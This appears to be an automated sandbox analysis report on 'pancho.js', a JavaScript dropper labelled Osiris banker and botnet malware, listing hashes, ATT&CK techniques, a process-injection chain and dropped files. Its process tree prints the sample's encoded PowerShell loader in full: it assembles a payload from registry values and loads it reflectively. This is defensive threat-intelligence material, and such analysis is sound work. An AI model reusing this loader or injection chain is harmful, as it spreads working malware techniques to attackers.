osiris | a0081f88e43338810fe23bd2e1fba8857b45f4378df38fc0c217426468b924fc

General

Target

pancho.js
Size

2.5MB
MD5

bd52c3fcb98700992066743b021876dd
SHA1

c711676cf2dadffa73b3bd03de01fc3e6ea4e892
SHA256

a0081f88e43338810fe23bd2e1fba8857b45f4378df38fc0c217426468b924fc
SHA512

24b6831f75736ba70ba8fd00263391e220c7e7cbf3c0d9ed1bfb24f92384a4694282509864d139950afaa910a2c278371354e61a51348b652419bd9c405d7e3b

Score

10^/10

osiris banker botnet ransomware

Malware Config

Signatures

Osiris
banker botnet osiris
Executes dropped EXE 1 IoCs

Processes:

GetX64BTIT.exe

pid process

3816 GetX64BTIT.exe
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

23 api.ipify.org
24 api.ipify.org
Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.

Connection Proxy
T1090
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
ransomware

System Information Discovery
T1082
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 200 set thread context of 1172 200 powershell.exe ImagingDevices.exe

pid	process
3816	GetX64BTIT.exe

flow	ioc
23	api.ipify.org
24	api.ipify.org

description	pid	process	target process
PID 200 set thread context of 1172	200	powershell.exe	ImagingDevices.exe

Suspicious behavior: EnumeratesProcesses 6987 IoCs

Processes:

powershell.exeImagingDevices.exe

pid	process
200	powershell.exe
200	powershell.exe
200	powershell.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe
1172	ImagingDevices.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 200 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

ImagingDevices.exe

pid process

1172 ImagingDevices.exe

description	pid	process
Token: SeDebugPrivilege	200	powershell.exe

pid	process
1172	ImagingDevices.exe

Suspicious use of WriteProcessMemory 17 IoCs

Processes:

wscript.execmd.exepowershell.exeImagingDevices.exe

description	pid	process	target process
PID 3116 wrote to memory of 3392	3116	wscript.exe	cmd.exe
PID 3116 wrote to memory of 3392	3116	wscript.exe	cmd.exe
PID 3392 wrote to memory of 200	3392	cmd.exe	powershell.exe
PID 3392 wrote to memory of 200	3392	cmd.exe	powershell.exe
PID 3392 wrote to memory of 200	3392	cmd.exe	powershell.exe
PID 200 wrote to memory of 1172	200	powershell.exe	ImagingDevices.exe
PID 200 wrote to memory of 1172	200	powershell.exe	ImagingDevices.exe
PID 200 wrote to memory of 1172	200	powershell.exe	ImagingDevices.exe
PID 200 wrote to memory of 1172	200	powershell.exe	ImagingDevices.exe
PID 200 wrote to memory of 1172	200	powershell.exe	ImagingDevices.exe
PID 200 wrote to memory of 1172	200	powershell.exe	ImagingDevices.exe
PID 200 wrote to memory of 1172	200	powershell.exe	ImagingDevices.exe
PID 200 wrote to memory of 1172	200	powershell.exe	ImagingDevices.exe
PID 200 wrote to memory of 1172	200	powershell.exe	ImagingDevices.exe
PID 200 wrote to memory of 1172	200	powershell.exe	ImagingDevices.exe
PID 1172 wrote to memory of 3816	1172	ImagingDevices.exe	GetX64BTIT.exe
PID 1172 wrote to memory of 3816	1172	ImagingDevices.exe	GetX64BTIT.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\pancho.js
1⤵
- Suspicious use of WriteProcessMemory
PID:3116

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAbwBmAHEAZgBzAGcAZAAgACMAPgAkAHUAPQAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgADcAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "
2⤵
- Suspicious use of WriteProcessMemory
PID:3392

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAbwBmAHEAZgBzAGcAZAAgACMAPgAkAHUAPQAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgADcAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:200

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1172

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"
5⤵
- Executes dropped EXE
PID:3816

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Connection Proxy

1

T1090

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Connection Proxy

1

T1090

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

MD5
b4cd27f2b37665f51eb9fe685ec1d373

SHA1
7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0

SHA256
91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581

SHA512
e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

MD5
b4cd27f2b37665f51eb9fe685ec1d373

SHA1
7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0

SHA256
91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581

SHA512
e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\x64btit.txt

MD5
14e6bdaafdf0275caf6062ba1d9859ae

SHA1
8da08ab17eb0afdf491550d1651c9c79781b41c1

SHA256
71ee32fd26b21ab352c73cc96781d6074570cc406d5b05ae3a35957f22714a43

SHA512
439ade02e82d66bc075746c384b3a19b90320c0279b15b2f83703a6496cb337c159f209d791b1fe412600418ea027386e22fe61102aa1b4e60d691a58a032484

Download Submit
memory/200-17-0x00000000097E0000-0x00000000097E1000-memory.dmp

Filesize
4KB

Download
memory/200-19-0x0000000009590000-0x0000000009591000-memory.dmp

Filesize
4KB

Download
memory/200-7-0x0000000007240000-0x0000000007241000-memory.dmp

Filesize
4KB

Download
memory/200-9-0x0000000007880000-0x0000000007881000-memory.dmp

Filesize
4KB

Download
memory/200-10-0x0000000007640000-0x0000000007641000-memory.dmp

Filesize
4KB

Download
memory/200-11-0x00000000077E0000-0x00000000077E1000-memory.dmp

Filesize
4KB

Download
memory/200-12-0x0000000007EB0000-0x0000000007EB1000-memory.dmp

Filesize
4KB

Download
memory/200-13-0x00000000080B0000-0x00000000080B1000-memory.dmp

Filesize
4KB

Download
memory/200-14-0x0000000007F50000-0x0000000007F51000-memory.dmp

Filesize
4KB

Download
memory/200-15-0x00000000088D0000-0x00000000088D1000-memory.dmp

Filesize
4KB

Download
memory/200-16-0x0000000008810000-0x0000000008811000-memory.dmp

Filesize
4KB

Download
memory/200-4-0x0000000000000000-mapping.dmp

Download
memory/200-18-0x0000000009540000-0x0000000009541000-memory.dmp

Filesize
4KB

Download
memory/200-8-0x0000000007242000-0x0000000007243000-memory.dmp

Filesize
4KB

Download
memory/200-20-0x0000000009D80000-0x0000000009D81000-memory.dmp

Filesize
4KB

Download
memory/200-21-0x00000000098C0000-0x00000000098C2000-memory.dmp

Filesize
8KB

Download
memory/200-22-0x0000000009AC0000-0x0000000009C0C000-memory.dmp

Filesize
1.3MB

Download
memory/200-30-0x0000000007243000-0x0000000007244000-memory.dmp

Filesize
4KB

Download
memory/200-5-0x00000000738C0000-0x0000000073FAE000-memory.dmp

Filesize
6.9MB

Download
memory/200-6-0x0000000005000000-0x0000000005001000-memory.dmp

Filesize
4KB

Download
memory/1172-25-0x0000000000400000-0x0000000000456000-memory.dmp

Filesize
344KB

Download
memory/1172-24-0x0000000000401698-mapping.dmp

Download
memory/1172-23-0x0000000000400000-0x0000000000456000-memory.dmp

Filesize
344KB

Download
memory/1172-29-0x0000000002B20000-0x0000000002BBF000-memory.dmp

Filesize
636KB

Download
memory/3392-3-0x0000000000000000-mapping.dmp

Download
memory/3816-26-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing